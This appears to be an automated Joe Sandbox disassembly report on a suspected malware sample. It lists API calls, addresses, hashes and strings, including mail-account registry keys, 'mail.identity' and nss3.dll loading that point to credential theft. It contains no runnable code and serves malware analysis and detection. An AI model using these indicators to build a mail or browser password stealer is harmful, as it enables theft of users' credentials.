                                                                                                    • String ID: winRead
                                                                                                    • API String ID: 1297977491-2759563040
                                                                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044955B
                                                                                                    • memset.MSVCRT ref: 0044956B
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 004090C2
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 4247780290-0
                                                                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                    APIs
                                                                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi$_mbscpy
                                                                                                    • String ID: smtp
                                                                                                    • API String ID: 2625860049-60245459
                                                                                                    • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                    • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                    • memset.MSVCRT ref: 00408258
                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                    Strings
                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                    • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                    • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C28C
                                                                                                    • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                    • String ID: S_@$l
                                                                                                    • API String ID: 3436799508-4018740455
                                                                                                    • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                    • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy
                                                                                                    • String ID: C^@$X$ini
                                                                                                    • API String ID: 714388716-917056472
                                                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 3492281209-168460110
                                                                                                    • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                    • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 275601554-2167791130
                                                                                                    • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                    • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                    APIs
                                                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                    • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                    • memset.MSVCRT ref: 0040D319
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 368790112-0
                                                                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                    • API String ID: 2221118986-515162456
                                                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                                                    • atoi.MSVCRT(?,00000000,?,76230A60,?,00000000), ref: 0040B619
                                                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4107816708-0
                                                                                                    • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                    • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                    • _gmtime64.MSVCRT ref: 00411437
                                                                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                    • strftime.MSVCRT ref: 00411476
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1886415126-0
                                                                                                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID: >$>$>
                                                                                                    • API String ID: 39653677-3911187716
                                                                                                    • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                    • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi
                                                                                                    • String ID: C@$mail.identity
                                                                                                    • API String ID: 1439213657-721921413
                                                                                                    • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                    • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _ultoasprintf
                                                                                                    • String ID: %s %s %s
                                                                                                    • API String ID: 432394123-3850900253
                                                                                                    • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                    • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                    • String ID: menu_%d
                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                    • _mbscat.MSVCRT ref: 004070FA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
